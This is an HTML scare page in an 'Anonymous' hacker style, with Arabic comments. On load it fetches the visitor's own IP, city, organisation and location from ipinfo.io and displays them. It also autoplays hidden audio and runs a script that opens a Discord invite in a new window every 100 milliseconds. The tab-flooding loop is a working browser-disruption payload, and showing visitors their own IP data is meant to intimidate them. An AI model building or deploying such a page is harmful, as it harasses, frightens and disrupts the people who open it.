<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>Anonymous</title>
<style>
    body {
        margin: 0;
        padding: 0;
        background: url('https://i.pinimg.com/originals/51/ae/a3/51aea3393b8234a1e69d8713a0a58bc3.gif') no-repeat center center fixed;
        background-size: cover;
        font-family: 'Courier New', Courier, monospace;
        color: orange;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
        flex-direction: column;
        text-align: center;
    }
    .image-container img {
        width: 750px; 
        height: auto;
        border: 2px solid orange; 
        border-radius: 15px;
        box-shadow: 0 0 15px rgba(255, 165, 0, 0.7); 
    }
    .info {
        margin-top: 20px;
        font-size: 1.5em;
        color: orange; 
        text-shadow: 0px 0px 8px orange, 0px 0px 15px orange, 0px 0px 25px orange; 
        letter-spacing: 4.5px; 
        white-space: pre-wrap;
    }
    .text {
        margin-top: 20px;
        font-size: 3em; 
        color: orange; 
        text-shadow: 0px 0px 8px orange, 0px 0px 15px orange, 0px 0px 25px orange; 
        letter-spacing: 4.5px; 
    }

    .music-player {
        display: none;
    }
</style>
</head>
<body>
    <div class="image-container">
        <img src="https://pbs.twimg.com/media/GbE-jy7X0AEZLZo?format=jpg&name=large" alt="Discord Image">
    </div>

    <!-- مشغل الاغنية الوحيد -->
    <div class="music-player">
        <iframe width="0" height="0" src="https://rr5---sn-xupn5a5u5x-4wgek.googlevideo.com/videoplayback?expire=1748197911&ei=tw0zaNWrLd7lxN8P7r3gUA&ip=2001%3A8f8%3A1335%3A3a65%3A1dbd%3A881%3Ad43b%3A29dc&id=o-AP-_LeSezF339SNLWb8-4mSsOw2IDYSn2738R6am5DdJ&itag=251&source=youtube&requiressl=yes&xpc=EgVo2aDSNQ%3D%3D&met=1748176311%2C&mh=cp&mm=31%2C29&mn=sn-xupn5a5u5x-4wgek%2Csn-4wg7lnee&ms=au%2Crdu&mv=m&mvi=5&pl=51&rms=au%2Cau&gcr=ae&initcwndbps=2093750&bui=AecWEAZrFAvD947t-fS74sQTQKru8rY-SgsCYQszicAA5wWctzSLHK4Ve9NcfChK7_tbykuwMK42Xbh7&vprv=1&svpuc=1&mime=audio%2Fwebm&ns=3P0HchSH-gtUv2WWqwmgH-UQ&rqh=1&gir=yes&clen=2175597&dur=130.641&lmt=1735642358656427&mt=1748175892&fvip=3&keepalive=yes&lmw=1&c=TVHTML5&sefc=1&txp=2318224&n=VozOi09McG0eBg&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cxpc%2Cgcr%2Cbui%2Cvprv%2Csvpuc%2Cmime%2Cns%2Crqh%2Cgir%2Cclen%2Cdur%2Clmt&lsparams=met%2Cmh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Crms%2Cinitcwndbps&lsig=ACuhMU0wRQIgPVtm-HzIOEy8_HUDGraQScZw52azHRb9DThOYSraLEgCIQD7AFZLLeFkXQU5LFA8GxLR9zwc7dVmDaIVHTjkDh_AaA%3D%3D&sig=AJfQdSswRQIgUeUA88M3i_jbMrjyfRKeeubMxNLb6OLPqPVYB8YuIKoCIQC8D-_jwPGTIIpCGtaq5LrY0rbELlLNKv6S1hwcwGOaOw%3D%3D" 
            frameborder="0" allow="autoplay" allowfullscreen></iframe>
    </div>

    <div class="info" id="ip-info">
        <strong>IP: <span id="ip"></span></strong><br>
        <span><strong>City:</strong> <span id="city"></span></span><br>
        <span><strong>Region:</strong> <span id="region"></span></span><br>
        <span><strong>Country:</strong> <span id="country"></span></span><br>
        <span><strong>Location:</strong> <span id="loc"></span></span><br>
        <span><strong>Organization:</strong> <span id="org"></span></span><br>
        <span><strong>Timezone:</strong> <span id="timezone"></span></span>
    </div>

    <div class="text">i am A7&lt;3 MR JOHN</div>

    <script>
        fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            delete data.readme;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.textContent = JSON.stringify(data, null, 2);
        });

        // فتح الرابط كل 0.1 ثانية (100 ملي ثانية)
        function openLinksRapidly() {
            setInterval(() => {
                window.open("https://discord.gg/VZ467VZkpu", "_blank");
            }, 100);
        }
        window.onload = openLinksRapidly;
    </script>
</body>
</html>
